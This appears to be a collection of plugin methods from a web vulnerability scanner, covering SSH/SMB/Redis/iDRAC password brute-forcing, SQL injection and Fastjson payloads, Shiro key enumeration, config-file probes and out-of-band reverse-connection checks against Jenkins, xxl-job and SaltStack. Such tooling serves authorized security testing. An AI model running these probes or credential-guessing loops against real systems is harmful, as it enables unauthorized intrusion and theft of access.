def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return swffile = [ 'common/swfupload/swfupload.swf', 'adminsoft/js/swfupload.swf', 'statics/js/swfupload/swfupload.swf', 'images/swfupload/swfupload.swf', 'js/upload/swfupload/swfupload.swf', 'addons/theme/stv1/_static/js/swfupload/swfupload.swf', 'admin/kindeditor/plugins/multiimage/images/swfupload.swf', 'includes/js/upload.swf', 'js/swfupload/swfupload.swf', 'Plus/swfupload/swfupload/swfupload.swf', 'e/incs/fckeditor/editor/plugins/swfupload/js/swfupload.swf', 'include/lib/js/uploadify/uploadify.swf', 'lib/swf/swfupload.swf', ] self.md5_list = [ '3a1c6cc728dddc258091a601f28a9c12', '53fef78841c3fae1ee992ae324a51620', '4c2fc69dc91c885837ce55d03493a5f5', ] mythread(self.test, swffile, cmd_line_options.threads)
def verify(self): if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件 return pwdfile = os.path.join("brute", "ssh_pass") userfile = os.path.join("brute", "ssh_user") pwds = [""] pwds += get_data_from_file( os.path.join(paths.MYSCAN_DATA_PATH, pwdfile)) users = get_data_from_file( os.path.join(paths.MYSCAN_DATA_PATH, userfile)) userpass = [] for user in users: for pwd in pwds: userpass.append((user, pwd)) userpass_ = [("oracle", "oracle"), ("postgresql", "postgresql")] userpass += userpass_ # patch_banner_timeout() if "Authentication failed" in self.crack_ssh( (get_random_str(6).lower(), get_random_str(6).lower())): mythread(self.crack_ssh, userpass, 1) if self.right_pwd is not None: self.result.append({ "name": self.name, "url": "tcp://{}:{}".format(self.addr, self.port), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "user/pwd": "/".join(self.right_pwd) } })
def verify(self): # 限定一下目录深度,reverse还是严格点 if self.url.count("/") != 3: return reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads( self.name, "dns") # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) tasks = reverse_dnscmd + reverse_urls mythread(self.run, tasks) sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return reverse_urls, reverse_data = generate_reverse_payloads(self.name) _, dns_data = generate(self.name, "dns") tasks = [] for reverse_url in reverse_urls: for cmd in [reverse_url, reverse_url.replace(reverse_set.get("reverse_http_ip", ""), dns_data)]: for path in ["", "securityRealm/user/admin/"]: tasks.append((cmd, path)) mythread(self.run, list(set(tasks))) sleep = True for hexdata in [reverse_data, dns_data]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") == 3 and self.dictdata["url"]["protocol"] == "https": host = self.dictdata["url"]["host"] self.req = { "method": "POST", "url": self.url + "data/login", "timeout": 30, "headers": { "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Accept": "*/*", "Origin": "https://{}".format(host), "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "https://{}/login.html".format(host), "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9"}, "data": '''user=root&password={}''', "allow_redirects": False, "verify": False, } self.run("calvin") if not self.success and self.isidrac: pwds = ["123456", "root", "!QAZ2wsx", "idarc"] mythread(self.run, pwds)
def verify(self): if self.dictdata.get("url").get("extension") in notAcceptedExt: return self.parse = dictdata_parser(self.dictdata) if not self.can_output(self.parse.getrootpath() + self.name): # 限定只输出一次 return # 针对参数为json格式 params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") test_args = [] for param in params: arg = param.get("value", "") if isjson(arg): test_args.append(param) # 针对body部分为json格式的数据包 if self.dictdata.get("request").get( "content_type") == 4: # data数据类型为json test_args.append(None) payloads = [ '''{"RANDOM": {"@type": "java.net.Inet4Address", "val": "DOMAIN"}}''', '''Set[{"@type":"java.net.URL","val":"http://DOMAIN"}''', '''{{"@type":"java.net.URL","val":"http://DOMAIN"}:0''', '''{"@type":"java.net.InetSocketAddress"{"address":,"val":"DOMAIN"}}''', ] if test_args: datas = [] for payload in payloads: for arg_ in test_args: datas.append((payload, arg_)) mythread(self.send_payload, datas, cmd_line_options.threads) # query dns log sleep = True for param, hexdata in self.hexdatas: res, res_data = query_reverse(hexdata, sleep) sleep = False if res: self.result.append({ "name": self.name, "url": self.parse.getrootpath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others": "{} in dnslog".format(hexdata), "param": "no param ,body vuln" if param is None else param.get( "name", ""), "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) self.can_output(self.parse.getrootpath() + self.name, True) return
def verify(self): if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件 return pwdfile = os.path.join("brute", "smb_pass") userfile = os.path.join("brute", "smb_user") pwds = [""] pwds += get_data_from_file( os.path.join(paths.MYSCAN_DATA_PATH, pwdfile)) users = get_data_from_file( os.path.join(paths.MYSCAN_DATA_PATH, userfile)) userpass = [] for user in users: for pwd in pwds: userpass.append((user, pwd)) mythread(self.crack_smb, userpass, cmd_line_options.threads) if self.right_pwd is not None: self.result.append({ "name": self.name, "url": "tcp://{}:{}".format(self.addr, self.port), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "user/pwd": "/".join(self.right_pwd) } })
def verify(self): if self.dictdata.get("url").get("extension") not in "": return if not self.can_output(self.parse.getrootpath() + self.name): # 限定只输出一次 return self.parse = dictdata_parser(self.dictdata) reqs = [] params = self.dictdata.get("request").get("params").get("params_url") # body为urlencode类型 if self.dictdata.get("request").get( "content_type") == 1: # data数据类型为urlencode params += self.dictdata.get("request").get("params").get( "params_body") # gen,payload 具体参数自己慢慢测试吧,没标定是那个参数 cmds = [] payloads_, hexdata = generate_reverse_payloads(self.name) _, dnshexdata = generate_reverse_payloads(self.name, "dns") for payload in payloads_: cmds.append(payload) cmds.append( payload.replace(reverse_set.get("reverse_http_ip"), dnshexdata)) for param in params: for cmd in cmds: for payload, func in self.payloads: payload = payload % (func(cmd)) req = self.parse.getreqfromparam(param, "a", payload, False) reqs.append(req) # send it mythread(self.send, reqs) # query sleep = True for hexdata in [hexdata, dnshexdata]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: self.result.append({ "name": self.name, "url": self.parse.getrootpath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) self.can_output(self.parse.getrootpath() + self.name, True) break
def verify(self): dictdata = self.dictdata # 把请求体和响应体 base64解码,便于搜索 request_raw = base64.b64decode(self.dictdata.get("request").get("raw").encode("utf8")) response_raw = base64.b64decode(self.dictdata.get("response").get("raw").encode("utf8")) dictdata["request"]["raw"] = request_raw.decode("utf-8", errors="ignore") dictdata["response"]["raw"] = response_raw.decode("utf-8", errors="ignore") dictdata["request"]["headers"] = str(dictdata["request"]["headers"]) dictdata["response"]["headers"] = str(dictdata["response"]["headers"]) if "others" in dictdata.keys(): del dictdata["others"] if "filter" in dictdata.keys(): del dictdata["filter"] dictdata["source"] = "burp" dictdata["url"]["ip"] = self.getaddr(dictdata.get("url").get("host")) dictdata["url"]["pathroot"] = "{protocol}://{host}:{port}/".format(**dictdata.get("url")) if dictdata["url"]["extension"] == "ico": body = response_raw[int(dictdata.get("response").get("bodyoffset")):] dictdata["url"]["icon_hash"] = str(mmh3.hash(base64.b64encode(body))) actions = [] action = { "_index": "httpinfo", "_id": self.http_md5(dictdata), "_source": dictdata } actions.append(action) # get url from html urls_from_html = self.get_html_url(dictdata["url"]["url"], response_raw[int(dictdata.get("response").get("bodyoffset")):].decode( "utf-8", "ignore"), dictdata["response"]["mime_inferred"]) logger.debug("urls_from_html total:{}".format(len(urls_from_html))) if urls_from_html: mythread(self.getaddr, self.hosts, 50) for url_data in urls_from_html: url_data["ip"] = self.dict_host_ip[url_data["host"]] action_ = { "_index": "httpinfo", "_id": getmd5("{ip}{pathroot}{path}".format(**url_data)), "_source": {"url": url_data, "source": "html", "ts": dictdata["ts"]} } actions.append(action_) try: helpers.bulk(others.es_conn, actions) logger.debug("es insert {} lines".format(len(actions))) except Exception as ex: logger.warning("Plugin {} get error:{}".format(__name__, ex)) traceback.print_exc()
def verify(self): if self.dictdata.get("url").get("extension")[:3].lower() not in ["", "php", "do", "action"]: return self.parser = dictdata_parser(self.dictdata) params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") if params: for param in params: thread_datas = [(param, test_payload) for test_payload in others.ssti_payloads] mythread(self.inject, thread_datas, cmd_line_options.threads)
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return # 生成字典 self.similar_rate = 0.8 # 相似度 ,越大误报越高 self.parser = dictdata_parser(self.dictdata) self.rootpath = self.parser.getrootpath() self.dicc = list(set(others.url_dict_path + self.get_domain_backfile(self.dictdata.get("url").get("host")))) self.error_content = self.check_url(get_random_str(10), verify=False) mythread(self.run, self.dicc, cmd_line_options.threads)
def find_ip(self): if is_ipaddr(self.domain): return self.domain red = getredis() key = getmd5("domain_to_ip_" + self.domain) res = red.get(key) if res: return res.decode() mythread(self.query, copy.deepcopy(others.dns_servers), 6) data = ",".join(list(self.msg)) red.set(key, data) return data
def find_dnsservers(self): logger.debug('[+] Validate DNS servers') # for server in open('dict/dns_servers.txt').readlines(): dns_ips = [] for server in open( os.path.join(paths.MYSCAN_DATA_PATH, "common", "dns_servers.txt")).readlines(): server = server.strip() if server and not server.startswith('#'): dns_ips.append(server) mythread(self.test_server, dns_ips, 5) return self.dns_servers
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return paths = [ "wp-config.php", "wp-config-sample.php", "wp-config.php.txt", "wp-config.php.bak", "wp-config.php.old", "wp-config-backup.txt", "wp-config.php.save", "wp-config.php~", "wp-config.php.orig", "wp-config.php.original", "wp-license.php?file=../..//wp-config", "_wpeprivate/config.json" ] mythread(self.check, paths, cmd_line_options.threads)
def verify(self): addExt = [ '.php', '.php3', '.php4', '.php5', '.php7', '.phtml', '.asp', '.aspx', '.ascx', '.asmx', '.chm', '.cfc', '.cfmx', '.cfml', '.py', '.rb', '.pl', '.cgi', '.htm', '.html', ] if self.dictdata.get("url").get( "extension").lower() in notAcceptedExt + addExt: return self.parse = dictdata_parser(self.dictdata) self.maxkey = self.parse.getrootpath() + self.name if not self.can_output(self.maxkey): return req = { "headers": { "Cookie": "rememberMe=1", }, "timeout": 10, "allow_redirects": False, "verify": False, } req_ = self.parse.generaterequest(req) r = request(**req_) if r != None and "deleteMe" in r.headers.get("Set-Cookie", ""): mythread(self.runit, self.shirokyes) if not self.success: self.save(r, "found shiro ,you can enum the key", 0)
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return self.parse = dictdata_parser(self.dictdata) self.maxkey = self.parse.getrootpath() + self.name set_cookie = self.dictdata.get("response").get("headers").get( "Set-Cookie", None) if set_cookie is not None and "rememberMe=deleteMe" in set_cookie: # 一个站点只测试一次,无论成功与否 if not self.can_output(self.maxkey): return # 做过了一次,此ip:port将不会再做 self.can_output(self.maxkey, True) # send key to enum mythread(self.send_poc, self.shirokyes, cmd_line_options.threads) # query from reverse_dnslog sleep = True for querykey, shirokey in self.querykeys.items(): res, resdata = query_reverse(querykey, sleep) sleep = False if res: self.result.append({ "name": self.name, "url": self.parse.getfilepath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "key": shirokey, "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) break if self.result == []: self.result.append({ "name": "shiro found", "url": self.parse.getfilepath(), "level": 0, # 0:Low 1:Medium 2:High "detail": { "vulmsg": "found shiro and brute key is failed. maybe the web server can't access dnslog ,try others tools .", "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } })
def verify(self): # 限定一下目录深度,涉及反连,谨慎点 if self.url.count("/") != 3: return # 验证是否是xxl-job req = { "method": "POST", "url": self.url + "run", "headers": { "Content-Type": "application/json" }, "allow_redirects": False, "verify": False, "timeout": 10 } r = request(**req) if r is not None and b"com.xxl.job.core.server" in r.content: reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads( self.name, "dns") # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) tasks = reverse_dnscmd + reverse_urls mythread(self.run, tasks) sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 添加限定条件 acceptedExt = ["php", "php3", "php4", "php5", "asp", "aspx", "jsp", "cfm", "pl", "shtml"] if self.dictdata.get("url").get("extension").lower() not in acceptedExt: return dirname = self.dictdata.get("url").get("path_folder") basename = os.path.basename(self.dictdata.get("url").get("path", "")) filename, ext = os.path.splitext(basename) ariants = [ filename + "/%3f." + ext, filename + ext.upper(), filename + ext[:-1] + parse.quote(ext[-1]), filename + "%252e" + ext, basename + ".%E2%73%70", basename + "%2easp", basename + "%2e", basename + "\\", basename + "?*", basename + "+", basename + "%20", basename + "%00", basename + "%01", basename + "%2f", basename + "%5c", basename + ".htr", basename + "::DATA" ] self.regexs = [ "(\<%[\s\S]*Response\.Write[\s\S]*%\>)", "(\<\?php[\x20-\x80\x0d\x0a\x09]+)", "(^#\!\\\/[\s\S]*\\\/perl)", "(^#\!\/[\s\S]*?\/python)", "(^#\!\/usr\/bin\/env\spython)", "(^#\!\/[\s\S]*?\/perl)", "using\sSystem[\s\S]*?class\s[\s\S]*?\s?{[\s\S]*}" ] self.regexWhitelist = [ "([^0-9a-zA-Z]+bxss\.me[^0-9a-zA-Z]+)", "([^0-9a-zA-Z]+r87\.me[^0-9a-zA-Z]+)", "(bnNsb29rdXAgbXFpc3d2dHh0c[a-zA-Z0-9]+5yODcubWU)" ] paths = [os.path.join(dirname, x) for x in ariants] mythread(self.send_req, paths, cmd_line_options.threads)
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return # 验证是否是saltstack req = { "method": "GET", "url": self.url, "allow_redirects": False, "verify": False, "timeout": 10 } r = request(**req) if r is not None and b"local_async" in r.content and b"local_batch" in r.content: reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads( self.name, "dns") # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) tasks = reverse_dnscmd + reverse_urls mythread(self.run, tasks) sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件 return pwdfile = os.path.join("brute", "redis_pass") pwds = [None] pwds += get_data_from_file( os.path.join(paths.MYSCAN_DATA_PATH, pwdfile)) mythread(self.crack_redis, pwds, cmd_line_options.threads) if self.right_pwd is not None: self.result.append({ "name": self.name, "url": "tcp://{}:{}".format(self.addr, self.port), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "password": self.right_pwd } })
def verify(self): if self.dictdata.get("url").get("extension") in notAcceptedExt: return self.parse = dictdata_parser(self.dictdata) if not self.can_output(self.parse.getrootpath() + self.name): # 限定只输出一次 return params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") # 匹配json格式的参数值 test_args = [] for param in params: arg = param.get("value", "") if isjson(arg): test_args.append(param) # 匹配body为json格式的 if self.dictdata.get("request").get( "content_type") == 4: # data数据类型为json test_args.append(None) mythread(self.send_payload, test_args, cmd_line_options.threads) self.query()
def verify(self): # 限定一下目录深度,reverse还是严格点 if self.url.count("/") != 3: return reverse_urls, reverse_data = generate_reverse_payloads(self.name) # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) _, dns_data = generate(self.name, "dns") tasks = [] for reverse_url in reverse_urls: for cmd in [ reverse_url, reverse_url.replace(reverse_set.get("reverse_http_ip", ""), dns_data) ]: tasks.append(cmd) mythread(self.run, tasks) sleep = True for hexdata in [reverse_data, dns_data]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return self.parser = dictdata_parser(self.dictdata) # send again . to find dynamic text self.dynamic = [] r = request(**self.parser.getrawrequest()) if r != None: ret = findDynamicContent( self.parser.getresponsebody().decode(errors="ignore"), r.text) if ret: self.dynamic.extend(ret) if self.dictdata.get("response").get("mime_stated") == "HTML": self.text = getFilteredPageContent( removeDynamicContent(r.text, self.dynamic)) else: self.text = removeDynamicContent(r.text, self.dynamic) else: return # test url and body params sql_flag = [ "' and '{0}'='{1}", '" and "{0}"="{1}', ] # url and body params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") if params: for param in params: success = False payloads = copy.deepcopy(sql_flag) if param.get("value") in ["desc", "asc"]: payloads += [ ",if('{0}'='{1}',1,(select 1 from information_schema.tables))" ] for payload in payloads: random_str = get_random_str(2).lower() payload_right = payload.format(random_str + "a", random_str + "a") payload_false = payload.format(random_str + "b", random_str + "c") req_true = self.parser.getreqfromparam( param, "a", payload_right) req_false = self.parser.getreqfromparam( param, "a", payload_false) if self.inject(req_false, req_true, payload_right, payload_false, param.get("name")): success = True break if not success and str(param.get("value")).isdigit(): param_value = param.get("value") random_num = random.randint(2, 8) payloads_num = [ ("/0", "*1"), ("/**/and+{0}={1}".format(random_num, random_num + 1), "/**/and+{0}={1}".format(random_num, random_num)), ] for payload_false, payload_right in payloads_num: req_true = self.parser.getreqfromparam( param, "a", payload_right) req_false = self.parser.getreqfromparam( param, "a", payload_false) if self.inject(req_false, req_true, param_value + payload_right, param_value + payload_false, param.get("name")): break pass # host header 部分 if not plugin_set.get("sqli").get("header_inject"): return header_msg = { "User-Agent": { "msg": "sqli_boolen_ua", "default": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" }, "Referer": { "msg": "sqli_boolen_referer", "default": "https://www.qq.com/search" }, "X-Forwarded-For": { "msg": "sqli_boolen_xff", "default": "12.40.9.144" }, "Real-Ip": { "msg": "sqli_boolen_ri", "default": "2.40.9.144" }, "X-Forwarded-Host": { "msg": "sqli_boolen_xfh", "default": "2.40.9.144" }, } reqs = [] for k, v in header_msg.items(): if self.output(v.get("msg")): logger.debug("start {} inject ".format(k)) headers = copy.deepcopy( self.dictdata.get("request").get("headers")) if k not in headers.keys(): headers[k] = v.get("default") reqs.append((headers, k, v)) mythread(self.inject_headers, reqs, cmd_line_options.threads)
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return # 搜索返回包: self.parser = dictdata_parser(self.dictdata) # 黑名单 # tomcat if self.dictdata.get("url").get("path").startswith( "/examples/") or self.dictdata.get("url").get( "path").startswith("/docs/"): return # body url参数注入 random_num = get_random_num(8) random_num_md5 = getmd5(random_num) payloads = [ ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format( random_num), random_num_md5, "a"), ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format( random_num), random_num_md5, "a"), ("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format( random_num), random_num_md5, "a"), ('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format( random_num), random_num_md5, "a"), ("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0" .format(random_num), random_num_md5, "a"), ('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0' .format(random_num), random_num_md5, "a"), ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format( random_num), random_num_md5, "a"), ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format( random_num), random_num_md5, "a"), ("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num), random_num_md5, "a"), ("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))". format(random_num), random_num_md5, "w"), ("extractvalue(1,concat(char(126),md5({})))".format(random_num), random_num_md5, "w") ] params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") reqs = [] if params: for param in params: for payload, search_str, method in [('鎈\'"\(', None, "a") ] + payloads: req = self.parser.getreqfromparam(param, method, payload) reqs.append( (req, payload, search_str, random_num_md5, param)) mythread(self.args_inject, reqs, cmd_line_options.threads) # header注入 if not plugin_set.get("sqli").get("header_inject"): return header_msg = { "User-Agent": { "msg": "sqli_error_ua", "default": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" }, "Referer": { "msg": "sqli_error_referer", "default": "https://www.qq.com/search" }, "X-Forwarded-For": { "msg": "sqli_error_xff", "default": "12.40.9.144" }, "Real-Ip": { "msg": "sqli_error_ri", "default": "2.40.9.144" }, "X-Forwarded-Host": { "msg": "sqli_error_xfh", "default": "2.40.9.144" }, } reqs = [] for k, v in header_msg.items(): if self.output(v.get("msg")): logger.debug("start {} inject ".format(k)) headers = copy.deepcopy( self.dictdata.get("request").get("headers")) if k not in headers.keys(): headers[k] = v.get("default") for payload, search_str, method in [('\'"\(', None, "a") ] + payloads: headers_withpayload = copy.deepcopy(headers) headers_withpayload[k] = headers_withpayload[ k] + payload if method == "a" else payload req = self.parser.generaterequest( {"headers": headers_withpayload}) reqs.append((req, (payload, search_str, k, v.get("msg")))) mythread(self.header_inject, reqs, cmd_line_options.threads)
def verify(self): mythread(self.poc, self.tests, cmd_line_options.threads)
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return self.parser = dictdata_parser(self.dictdata) # args inject params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") if params: for param in params: self.param = param self.injectstatus = False payloads = copy.deepcopy(self.payloads_alpha) + copy.deepcopy( self.payloads_digit) mythread(self.args_inject, payloads, cmd_line_options.threads) # header inject if not plugin_set.get("sqli").get("header_inject"): return header_msg = { "User-Agent": { "msg": "sqli_timeblind_ua", "default": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" }, "Referer": { "msg": "sqli_timeblind_referer", "default": "https://www.qq.com/search" }, "X-Forwarded-For": { "msg": "sqli_timeblind_xff", "default": "12.40.9.144" }, "Real-Ip": { "msg": "sqli_timeblind_ri", "default": "2.40.9.144" }, "X-Forwarded-Host": { "msg": "sqli_timeblind_xfh", "default": "2.40.9.144" }, } reqs = [] payloads = copy.deepcopy(self.payloads_alpha) for k, v in header_msg.items(): if self.output(v.get("msg")): logger.debug("start timeblind {} inject ".format(k)) headers = copy.deepcopy( self.dictdata.get("request").get("headers")) if k not in headers.keys(): headers[k] = v.get("default") for test_payload in payloads: reqs.append((headers, k, v, test_payload)) # for test in payloads: # headers_withpayload = copy.deepcopy(headers) # reqs.append() # headers_withpayload[k] = headers_withpayload[k] + payload if method == "a" else payload # req =self.parser.generaterequest({"headers": headers_withpayload}) # reqs.append((req, (payload, search_str, k, v.get("msg")))) mythread(self.headers_inject, reqs, cmd_line_options.threads)
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return mythread(self.poc1, self.get_cmds(), cmd_line_options.threads) self.poc2()
def verify(self): # 限定根目录 if self.url.count("/") != 3: return mythread(self.run, self.get_payloads())
def verify(self): # 限定根目录 if self.url is not None: if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return mythread(self.run, self.get_payloads())
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return mythread(self.runit, ["getSpiritsFromVideo", "getImage", "getImageMP4"], cmd_line_options.threads)